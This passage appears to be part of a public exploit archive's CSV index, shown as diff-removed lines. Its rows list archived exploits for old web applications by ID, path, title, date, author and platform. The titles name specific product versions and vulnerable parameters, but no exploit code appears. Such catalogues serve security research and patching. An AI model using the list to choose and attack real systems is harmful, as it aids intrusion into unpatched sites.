Corporation",asp,webapps, -23571,exploits/asp/webapps/23571.txt,"SelectSurvey CMS - 'ASP.NET' Arbitrary File Upload",2012-12-21,040,asp,webapps, -23572,exploits/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP Firmware 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps, -23573,exploits/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps, -23575,exploits/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 - Multiple SQL Injections",2012-12-21,"High-Tech Bridge SA",php,webapps, -23599,exploits/php/webapps/23599.txt,"Gallery 1.3.x/1.4 - Remote Global Variable Injection",2004-01-26,"Bharat Mediratta",php,webapps, -23606,exploits/php/webapps/23606.txt,"Xoops 2.0.x - 'viewtopic.php' Cross-Site Scripting",2004-01-26,"Ben Drysdale",php,webapps, -23607,exploits/php/webapps/23607.txt,"Kietu 2/3 - 'index.php' Remote File Inclusion",2004-01-26,"Himeur Nourredine",php,webapps, -23613,exploits/cgi/webapps/23613.txt,"Leif M. Wright Web Blog 1.1 - File Disclosure",2004-01-20,"Zone-h Security Team",cgi,webapps, -23615,exploits/cgi/webapps/23615.txt,"PJ CGI Neo Review - Directory Traversal",2004-01-29,"Zone-h Security Team",cgi,webapps, -23616,exploits/php/webapps/23616.txt,"PHPGedView 2.x - 'Editconfig_gedcom.php' Directory Traversal",2004-01-30,"Cedric Cochin",php,webapps, -23617,exploits/php/webapps/23617.txt,"PHPGedView 2.x - '[GED_File]_conf.php' Remote File Inclusion",2004-01-30,"Cedric Cochin",php,webapps, -23618,exploits/php/webapps/23618.txt,"JBrowser 1.0/2.x - 'browser.php' Directory Traversal",2004-01-30,"Himeur Nourredine",php,webapps, -23619,exploits/php/webapps/23619.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'fonctions.lib.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps, -23620,exploits/php/webapps/23620.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'derniers_commentaires.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps, -23621,exploits/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'admin.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps, -23623,exploits/php/webapps/23623.txt,"City Directory Review and Rating Script - 'search.php' SQL Injection",2012-12-24,3spi0n,php,webapps, -23624,exploits/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,php,webapps, -23625,exploits/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php?id' SQL Injection",2012-12-24,Red_Hat,php,webapps, -23687,exploits/php/webapps/23687.txt,"Macallan Mail Solution Macallan Mail Solution 2.8.4.6 (Build 260) - Web Interface Authentication Bypass",2004-02-12,"Ziv Kamir",php,webapps, -23688,exploits/php/webapps/23688.txt,"vBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting",2004-02-12,"Jamie Fisher",php,webapps, -23635,exploits/asp/webapps/23635.txt,"Niti Telecom Caravan Business Server 2.00-03D - Directory Traversal",2004-02-02,dr_insane,asp,webapps, -23636,exploits/php/webapps/23636.txt,"Qualiteam X-Cart 3.x - 'general.php?perl_binary' Arbitrary Command Execution",2004-02-03,Philip,php,webapps, -23637,exploits/php/webapps/23637.txt,"Qualiteam X-Cart 3.x - 'upgrade.php?perl_binary' Arbitrary Command Execution",2004-02-03,Philip,php,webapps, -23639,exploits/php/webapps/23639.txt,"Qualiteam X-Cart 3.x - Multiple Remote Information Disclosure Vulnerabilities",2004-02-03,Philip,php,webapps, -23640,exploits/php/webapps/23640.txt,"phpMyAdmin 2.x - 'Export.php' File Disclosure",2004-02-03,"Cedric Cochin",php,webapps, -23644,exploits/php/webapps/23644.php,"PHPX 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps, -23645,exploits/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection",2004-02-04,G00db0y,php,webapps, -23646,exploits/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection",2004-02-04,G00db0y,php,webapps, -23647,exploits/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps, -23653,exploits/php/webapps/23653.txt,"Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps, -23657,exploits/php/webapps/23657.txt,"Mambo Open Source 4.6 - 'Itemid' Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps, -23659,exploits/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing",2004-02-06,"Tri Huynh",cgi,webapps, -23663,exploits/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 'News' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps, -23669,exploits/php/webapps/23669.txt,"PHP-Nuke 6.x/7.x 'Reviews' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps, -23670,exploits/php/webapps/23670.pl,"PHP-Nuke 6.x/7.x - Public Message SQL Injection",2004-02-09,"Janek Vind",php,webapps, -23673,exploits/php/webapps/23673.txt,"Guru Auction 2.0 - Multiple SQL Injections",2012-12-26,v3n0m,php,webapps, -23676,exploits/asp/webapps/23676.txt,"Maxwebportal 1.3x - 'down.asp' HTTP_REFERER Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps, -23677,exploits/asp/webapps/23677.txt,"Maxwebportal 1.3x - Personal Message 'SendTo' Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps, -23680,exploits/php/webapps/23680.php,"PHP-Nuke 6.x - 'Category' SQL Injection",2003-12-23,pokleyzz,php,webapps, -23683,exploits/php/webapps/23683.txt,"VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps, -23684,exploits/php/webapps/23684.txt,"VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps, -23685,exploits/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps, -23696,exploits/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps, -23697,exploits/php/webapps/23697.txt,"AllMyGuests 0.x - 'info.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps, -23698,exploits/php/webapps/23698.txt,"AllMyVisitors 0.x - 'info.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps, -23699,exploits/php/webapps/23699.txt,"AllMyLinks 0.x - 'footer.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps, -23702,exploits/asp/webapps/23702.txt,"ProductCart 1.x/2.x - Weak Cryptography",2004-02-16,"Nick Gudov",asp,webapps, -23703,exploits/asp/webapps/23703.txt,"ProductCart 1.x/2.x - 'advSearch_h.asp' Multiple SQL Injections",2004-02-16,"Nick Gudov",asp,webapps, -23704,exploits/asp/webapps/23704.txt,"ProductCart 1.x/2.x - 'Custva.asp?redirectUrl' Cross-Site Scripting",2004-02-16,"Nick Gudov",asp,webapps, -23705,exploits/cgi/webapps/23705.txt,"ShopCartCGI 2.3 - 'gotopage.cgi' Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps, -23706,exploits/cgi/webapps/23706.txt,"ShopCartCGI 2.3 - genindexpage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps, -23710,exploits/php/webapps/23710.txt,"YABB SE 1.5 - 'Quote' SQL Injection",2004-02-16,BaCkSpAcE,php,webapps, -23711,exploits/php/webapps/23711.txt,"eCommerce Corporation Online Store Kit 3.0 - 'More.php?id' SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps, -23712,exploits/php/webapps/23712.txt,"eCommerce Corporation Online Store Kit 3.0 - 'More.php' Cross-Site Scripting",2003-02-17,"David Sopas Ferreira",php,webapps, -23718,exploits/php/webapps/23718.txt,"eCommerce Corporation Online Store Kit 3.0 - 'shop.php?cat' SQL Injection",2004-02-18,G00db0y,php,webapps, -23719,exploits/php/webapps/23719.txt,"eCommerce Corporation Online Store Kit 3.0 - 'shop_by_brand.php?cat_manufacturer' SQL Injection",2004-02-18,G00db0y,php,webapps, -23720,exploits/php/webapps/23720.txt,"eCommerce Corporation Online Store Kit 3.0 - 'listing.php?id' SQL Injection",2004-02-18,G00db0y,php,webapps, -23722,exploits/php/webapps/23722.txt,"Fool's Workshop Owl's Workshop 1.0 - 'multiplechoice/index.php' Arbitrary File Access",2004-02-18,G00db0y,php,webapps, -23723,exploits/php/webapps/23723.txt,"Fool's Workshop Owl's Workshop 1.0 - 'glossary.php' Arbitrary File Access",2004-02-18,G00db0y,php,webapps, -23724,exploits/php/webapps/23724.txt,"Fool's Workshop Owl's Workshop 1.0 - 'newmultiplechoice.php' Arbitrary File Access",2004-02-18,G00db0y,php,webapps, -23725,exploits/php/webapps/23725.txt,"Fool's Workshop Owl's Workshop 1.0 - '/glossaries/index.php?File' Arbitrary File Access",2004-02-18,G00db0y,php,webapps, -23726,exploits/php/webapps/23726.txt,"Fool's Workshop Owl's Workshop 1.0 - 'readings/index.php' Arbitrary File Access",2004-02-18,G00db0y,php,webapps, -23727,exploits/php/webapps/23727.txt,"Fool's Workshop Owl's Workshop 1.0 - 'resultsignore.php' Arbitrary File Access",2004-02-18,G00db0y,php,webapps, -23729,exploits/asp/webapps/23729.txt,"WebCortex WebStores2000 - 'error.asp' Cross-Site Scripting",2004-02-18,"Nick Gudov",asp,webapps, -23742,exploits/php/webapps/23742.txt,"phpNewsManager 1.36 - functions Script File Disclosure",2004-02-23,G00db0y,php,webapps, -23744,exploits/php/webapps/23744.txt,"EZBoard 7.3 - Font Tag HTML Injection",2004-02-23,"Cheng Peng Su",php,webapps, -23745,exploits/php/webapps/23745.txt,"XMB Forum 1.8 - 'u2uadmin.php?uid' Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps, -23746,exploits/php/webapps/23746.txt,"XMB Forum 1.8 - 'editprofile.php?user' Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps, -23747,exploits/php/webapps/23747.txt,"XMB Forum 1.8 - BBcode align Tag Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps, -23748,exploits/php/webapps/23748.txt,"XMB Forum 1.8 - 'forumdisplay.php' Multiple SQL Injections",2004-02-23,"Janek Vind",php,webapps, -23749,exploits/php/webapps/23749.txt,"LiveJournal 1.1 - CSS HTML Injection",2004-02-23,"Michael Scovetta",php,webapps, -23753,exploits/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - 'PHPtest.php' Full Path Disclosure",2004-02-24,"Rafel Ivgi",php,webapps, -23767,exploits/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps, -23770,exploits/php/webapps/23770.txt,"IGeneric Free Shopping Cart 1.4 - SQL Injection",2004-03-01,"David Sopas Ferreira",php,webapps, -23773,exploits/php/webapps/23773.txt,"IGeneric Free Shopping Cart 1.4 - Cross-Site Scripting",2004-03-01,"David Sopas Ferreira",php,webapps, -23774,exploits/php/webapps/23774.txt,"YaBB SE 1.5.x - Arbitrary File Deletion",2004-03-01,"Alnitak & BackSpace",php,webapps, -23775,exploits/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple SQL Injections",2004-03-01,"Alnitak & BackSpace",php,webapps, -23781,exploits/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php?posthash' Blind SQL Injection",2012-12-31,"Joshua Rogers",php,webapps, -23782,exploits/php/webapps/23782.txt,"Joomla! Component Spider Calendar - 'date' Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps, -24047,exploits/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,php,webapps, -24048,exploits/php/webapps/24048.txt,"Protector System 1.15 - 'blocker_query.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-23,waraxe,php,webapps, -24046,exploits/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting",2004-04-23,DarkBicho,php,webapps, -23791,exploits/asp/webapps/23791.txt,"SpiderSales 2.0 Shopping Cart - Multiple Vulnerabilities",2004-03-03,"Nick Gudov",asp,webapps, -23792,exploits/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x (Multiple Modules) - Cross-Site Scripting",2004-03-05,"Rafel Ivgi The-Insider",php,webapps, -23795,exploits/php/webapps/23795.txt,"Invision Power Board 1.3 - 'Pop' Cross-Site Scripting",2004-03-09,"Rafel Ivgi The-Insider",php,webapps, -23797,exploits/php/webapps/23797.txt,"Confixx 2 - 'DB' SQL Injection",2004-03-09,wkr,php,webapps, -23798,exploits/php/webapps/23798.txt,"Confixx 2 - Perl Debugger Remote Command Execution",2004-03-09,wkr,php,webapps, -40402,exploits/php/webapps/40402.pl,"VegaDNS 0.13.2 - Remote Command Injection",2016-09-20,Wireghoul,php,webapps, -23806,exploits/cgi/webapps/23806.txt,"cPanel 5/6/7/8/9 - 'dir' Cross-Site Scripting",2004-03-12,Fable,cgi,webapps, -23807,exploits/cgi/webapps/23807.txt,"cPanel 5/6/7/8/9 - Login Script Remote Command Execution",2004-03-12,"Arab VieruZ",cgi,webapps, -23809,exploits/cgi/webapps/23809.txt,"Emumail EMU Webmail 5.2.7 - nit.emu Information Disclosure",2004-03-12,dr_insane,cgi,webapps, -23810,exploits/cgi/webapps/23810.txt,"Emumail EMU Webmail 5.2.7 - 'emumail.fcgi' Multiple Cross-Site Scripting Vulnerabilities",2004-03-12,dr_insane,cgi,webapps, -23812,exploits/php/webapps/23812.txt,"YABB SE 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-15,"Cheng Peng Su",php,webapps, -23813,exploits/asp/webapps/23813.txt,"VocalTec VGW4/8 Telephony Gateway - Remote Authentication Bypass",2004-03-15,"Rafel Ivgi The-Insider",asp,webapps, -23814,exploits/php/webapps/23814.txt,"PHP-Nuke 7.1 Recommend_Us Module - 'fname' Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps, -23815,exploits/php/webapps/23815.txt,"WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php?basepath' Remote File Inclusion",2004-03-15,"Janek Vind",php,webapps, -23816,exploits/php/webapps/23816.txt,"WarpSpeed 4nAlbum Module 0.92 - 'modules.php?gid' SQL Injection",2004-03-15,"Janek Vind",php,webapps, -23817,exploits/php/webapps/23817.txt,"WarpSpeed 4nAlbum Module 0.92 - 'nmimage.php?z' Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps, -23818,exploits/php/webapps/23818.txt,"Phorum 3.x - 'register.php' HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps, -23819,exploits/php/webapps/23819.txt,"Phorum 3.x - 'login.php' HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps, -23820,exploits/php/webapps/23820.txt,"Phorum 3.x - 'profile.php?target' Cross-Site Scripting",2004-03-15,JeiAr,php,webapps, -23821,exploits/php/webapps/23821.php,"phpBB 1.x/2.0.x - 'search.php?search_results' SQL Injection",2004-01-04,pokleyzz,php,webapps, -23822,exploits/php/webapps/23822.txt,"vBulletin 3.0 - 'forumdisplay.php' Cross-Site Scripting",2004-03-16,JeiAr,php,webapps, -23823,exploits/php/webapps/23823.txt,"vBulletin 3.0 - 'showthread.php' Cross-Site Scripting",2004-03-16,JeiAr,php,webapps, -23824,exploits/php/webapps/23824.txt,"Mambo Open Source 4.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-03-16,JeiAr,php,webapps, -23825,exploits/php/webapps/23825.txt,"Mambo Open Source 4.5 - 'index.php?mos_change_template' Cross-Site Scripting",2004-03-16,JeiAr,php,webapps, -23828,exploits/php/webapps/23828.txt,"e107 1.0.1 - Arbitrary JavaScript Execution (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",php,webapps, -23829,exploits/php/webapps/23829.txt,"e107 1.0.2 - SQL Injection (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",php,webapps, -23831,exploits/php/webapps/23831.py,"Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Command Execution",2013-01-02,xistence,php,webapps, -23834,exploits/php/webapps/23834.txt,"Mambo Open Source 4.5 - 'index.php' SQL Injection",2004-03-16,JeiAr,php,webapps, -23835,exploits/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 - Image Tag Admin Command Execution",2004-03-16,"Janek Vind",php,webapps, -23843,exploits/php/webapps/23843.txt,"Belchior Foundry VCard 2.8 - Authentication Bypass",2004-03-17,"saudi linux",php,webapps, -23844,exploits/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php?language' Full Path Disclosure",2004-03-18,"Janek Vind",php,webapps, -23845,exploits/php/webapps/23845.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php' Multiple Cross-Site Scripting Vulnerabilities",2004-03-18,"Janek Vind",php,webapps, -23851,exploits/asp/webapps/23851.txt,"Expinion.net Member Management System 2.1 - 'news_view.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps, -23852,exploits/asp/webapps/23852.txt,"Expinion.net Member Management System 2.1 - 'resend.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps, -23853,exploits/asp/webapps/23853.txt,"Expinion.net Member Management System 2.1 - 'error.asp?err' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps, -40401,exploits/php/webapps/40401.txt,"ZineBasic 1.1 - Arbitrary File Disclosure",2016-09-19,bd0rk,php,webapps,80 -23854,exploits/asp/webapps/23854.txt,"Expinion.net Member Management System 2.1 - 'register.asp?err' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps, -23857,exploits/asp/webapps/23857.txt,"Expinion.net News Manager Lite 2.5 - 'comment_add.asp' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps, -23858,exploits/asp/webapps/23858.txt,"Expinion.net News Manager Lite 2.5 - 'search.asp' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps, -23859,exploits/asp/webapps/23859.txt,"Expinion.net News Manager Lite 2.5 - 'category_news_headline.asp' Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps, -23860,exploits/asp/webapps/23860.txt,"Expinion.net News Manager Lite 2.5 - 'more.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps, -23861,exploits/asp/webapps/23861.txt,"Expinion.net News Manager Lite 2.5 - 'category_news.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps, -23862,exploits/asp/webapps/23862.txt,"Expinion.net News Manager Lite 2.5 - 'news_sort.asp?filter' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps, -23863,exploits/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 - 'NEWS_LOGIN?admin' Cookie Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps, -23865,exploits/php/webapps/23865.txt,"vBulletin 2.x - 'private.php' Cross-Site Scripting",2004-03-22,JeiAr,php,webapps, -23866,exploits/php/webapps/23866.txt,"phpBB 1.x/2.0.x - Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps, -23867,exploits/php/webapps/23867.txt,"Invision Power Services Invision Gallery 1.0.1 - Multiple SQL Injections",2004-03-23,JeiAr,php,webapps, -23868,exploits/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 - 'id' SQL Injection",2004-03-22,JeiAr,php,webapps, -23869,exploits/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module - Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",php,webapps, -23870,exploits/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module - HTTP Referrer Field SQL Injection",2004-03-22,"Janek Vind",php,webapps, -23872,exploits/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal",2004-03-22,snifer,jsp,webapps, -23875,exploits/windows/webapps/23875.txt,"Trend Micro Interscan VirusWall localweb - Directory Traversal",2004-03-24,"Tri Huynh",windows,webapps, -23885,exploits/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x - 'showgallery.php' Multiple SQL Injections",2004-03-29,JeiAr,php,webapps, -23886,exploits/windows/webapps/23886.txt,"Simple Web Server 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps, -23888,exploits/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps, -23890,exploits/cgi/webapps/23890.txt,"Fresh Guest Book 1.0/2.x - HTML Injection",2004-03-29,"koi8-r Shelz",cgi,webapps, -23891,exploits/asp/webapps/23891.txt,"Alan Ward A-CART 2.0 - 'category.asp?catcode' SQL Injection (2)",2004-03-29,"Manuel Lopez",asp,webapps, -23894,exploits/cgi/webapps/23894.txt,"Cloisterblog 1.2.2 - Journal.pl Directory Traversal",2004-03-29,Dotho,cgi,webapps, -23895,exploits/asp/webapps/23895.txt,"Interchange 4.8.x/5.0 - Remote Information Disclosure",2004-03-30,anonymous,asp,webapps, -23897,exploits/cgi/webapps/23897.txt,"LinBit Technologies LINBOX Officeserver - Remote Authentication Bypass",2004-03-30,"Martin Eiszner",cgi,webapps, -23898,exploits/asp/webapps/23898.txt,"Cactusoft CactuShop 5.0/5.1 - SQL Injection",2004-03-31,"Nick Gudov",asp,webapps, -23899,exploits/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 - Cross-Site Scripting",2004-03-31,"Nick Gudov",asp,webapps, -23901,exploits/php/webapps/23901.txt,"pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps, -23907,exploits/cgi/webapps/23907.pl,"Aborior Encore Web Forum - Arbitrary Command Execution",2004-04-03,K-159,cgi,webapps, -23908,exploits/php/webapps/23908.txt,"OpenBB 1.0.6 - 'myhome.php' SQL Injection",2004-04-05,"Mark Tesn",php,webapps, -23913,exploits/cgi/webapps/23913.txt,"FloosieTek FTGate Mail Server 1.2 - 'index.fts?folder' Cross-Site Scripting",2004-04-06,dr_insane,cgi,webapps, -23914,exploits/cgi/webapps/23914.txt,"FloosieTek FTGate Mail Server 1.2 - Full Path Disclosure",2004-04-06,dr_insane,cgi,webapps, -23924,exploits/multiple/webapps/23924.txt,"Nexpose Security Console - Cross-Site Request Forgery",2013-01-06,"Robert Gilbert",multiple,webapps, -23928,exploits/php/webapps/23928.txt,"NukeCalendar 1.1.a - 'modules.php' Full Path Disclosure",2004-04-08,"Janek Vind",php,webapps, -23929,exploits/php/webapps/23929.txt,"NukeCalendar 1.1.a - 'block-calendar.php' Full Path Disclosure",2004-04-08,"Janek Vind",php,webapps, -23930,exploits/php/webapps/23930.txt,"NukeCalendar 1.1.a - 'block-Calendar1.php' Full Path Disclosure",2004-04-08,"Janek Vind",php,webapps, -23931,exploits/php/webapps/23931.txt,"NukeCalendar 1.1.a - 'block-Calendar_center.php' Full Path Disclosure",2004-04-08,"Janek Vind",php,webapps, -23932,exploits/php/webapps/23932.txt,"NukeCalendar 1.1.a - 'eid' Cross-Site Scripting",2004-04-08,"Janek Vind",php,webapps, -23933,exploits/php/webapps/23933.txt,"NukeCalendar 1.1.a - 'eid' SQL Injection",2004-04-08,"Janek Vind",php,webapps, -23934,exploits/php/webapps/23934.txt,"AzDGDatingLite 2.1.1 - 'index.php?language' Cross-Site Scripting",2004-04-07,"Janek Vind",php,webapps, -23935,exploits/php/webapps/23935.txt,"AzDGDatingLite 2.1.1 - 'view.php?id' Cross-Site Scripting",2004-04-07,"Janek Vind",php,webapps, -23937,exploits/cgi/webapps/23937.txt,"1st Class Mail Server 4.0 1 - viewmail.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps, -23938,exploits/cgi/webapps/23938.txt,"1st Class Mail Server 4.0 1 - Index Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps, -23939,exploits/cgi/webapps/23939.txt,"1st Class Mail Server 4.0 1 - members.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps, -23940,exploits/cgi/webapps/23940.txt,"1st Class Mail Server 4.0 1 - general.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps, -23941,exploits/cgi/webapps/23941.txt,"1st Class Mail Server 4.0 1 - advanced.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps, -23942,exploits/cgi/webapps/23942.txt,"1st Class Mail Server 4.0 1 - list.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps, -23947,exploits/php/webapps/23947.txt,"TikiWiki Project 1.8 - 'tiki-switch_theme.php?theme' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps, -23948,exploits/php/webapps/23948.txt,"TikiWiki Project 1.8 - 'img/wiki_up' Arbitrary File Upload",2004-04-12,JeiAr,php,webapps, -23949,exploits/php/webapps/23949.txt,"TikiWiki Project 1.8 - 'tiki-map.phtml' Traversal Arbitrary File / Directory Enumeration",2004-04-12,JeiAr,php,webapps, -23950,exploits/php/webapps/23950.txt,"TikiWiki Project 1.8 - User Profile Multiple Option Remote Code Injections",2004-04-12,JeiAr,php,webapps, -23951,exploits/php/webapps/23951.txt,"TikiWiki Project 1.8 - Add Site Multiple Options Remote Code Injections",2004-04-12,JeiAr,php,webapps, -23952,exploits/php/webapps/23952.txt,"TikiWiki Project 1.8 - 'categorize.php' Direct Request Full Path Disclosure",2004-04-12,JeiAr,php,webapps, -23953,exploits/php/webapps/23953.txt,"TikiWiki Project 1.8 - 'messu-mailbox.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,JeiAr,php,webapps, -23954,exploits/php/webapps/23954.txt,"TikiWiki Project 1.8 - 'messu-read.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,JeiAr,php,webapps, -23955,exploits/php/webapps/23955.txt,"TikiWiki Project 1.8 - 'tiki-read_article.php?articleId' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps, -23956,exploits/php/webapps/23956.txt,"TikiWiki Project 1.8 - 'tiki-browse_categories.php?parentId' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps, -23957,exploits/php/webapps/23957.txt,"TikiWiki Project 1.8 - 'tiki-index.php?comments_threshold' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps, -23958,exploits/php/webapps/23958.txt,"TikiWiki Project 1.8 - 'tiki-print_article.php?articleId' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps, -23959,exploits/php/webapps/23959.txt,"TikiWiki Project 1.8 - 'tiki-list_file_gallery.php?galleryID' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps, -23960,exploits/php/webapps/23960.txt,"TikiWiki Project 1.8 - 'tiki-upload_file.php?galleryID' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps, -23961,exploits/php/webapps/23961.txt,"TikiWiki Project 1.8 - 'tiki-view_faq.php?faqId' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps, -23962,exploits/php/webapps/23962.txt,"TikiWiki Project 1.8 - 'tiki-view_chart.php?chartId' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps, -23963,exploits/php/webapps/23963.txt,"TikiWiki Project 1.8 - 'tiki-usermenu.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps, -23964,exploits/php/webapps/23964.txt,"TikiWiki Project 1.8 - 'tiki-list_file_gallery.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps, -23965,exploits/php/webapps/23965.txt,"TikiWiki Project 1.8 - 'tiki-directory_ranking.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps, -23966,exploits/php/webapps/23966.txt,"TikiWiki Project 1.8 - 'tiki-browse_categories.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps, -23967,exploits/php/webapps/23967.txt,"E Sms Script - Multiple SQL Injections",2013-01-08,cr4wl3r,php,webapps, -23968,exploits/asp/webapps/23968.txt,"Advantech Webaccess HMI/SCADA Software - Persistence Cross-Site Scripting",2013-01-08,"SecPod Research",asp,webapps, -23970,exploits/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder - Arbitrary File Disclosure (Metasploit)",2013-01-08,Metasploit,php,webapps, -23971,exploits/php/webapps/23971.txt,"TikiWiki Project 1.8 - 'tiki-index.php?comments_offset & offset' SQL Injections",2004-04-12,JeiAr,php,webapps, -23972,exploits/php/webapps/23972.txt,"TikiWiki Project 1.8 - 'tiki-user_tasks.php?offset & sort_mode' SQL Injections",2004-04-12,JeiAr,php,webapps, -23973,exploits/php/webapps/23973.txt,"TikiWiki Project 1.8 - 'tiki-directory_search.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps, -23974,exploits/php/webapps/23974.txt,"TikiWiki Project 1.8 - 'tiki-file_galleries.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps, -23975,exploits/php/webapps/23975.txt,"TikiWiki Project 1.8 - 'tiki-list_faqs.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps, -23976,exploits/php/webapps/23976.txt,"TikiWiki Project 1.8 - 'tiki-list_trackers.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps, -23977,exploits/php/webapps/23977.txt,"TikiWiki Project 1.8 - 